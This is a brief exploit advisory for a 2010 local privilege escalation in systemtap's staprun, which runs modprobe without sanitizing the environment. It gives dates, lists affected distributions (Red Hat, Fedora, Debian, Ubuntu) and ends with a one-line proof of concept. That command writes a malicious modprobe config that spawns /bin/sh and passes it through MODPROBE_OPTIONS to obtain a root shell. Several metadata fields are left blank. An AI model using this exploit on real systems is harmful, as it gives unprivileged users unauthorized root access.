Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17
PoC provided by :
Affected version(s) :
Red Hat, Fedora, Debian, Ubuntu, etc.
Tested on Debian squeeze/sid with :
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.
Require “systemtap-runtime” on Debian
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever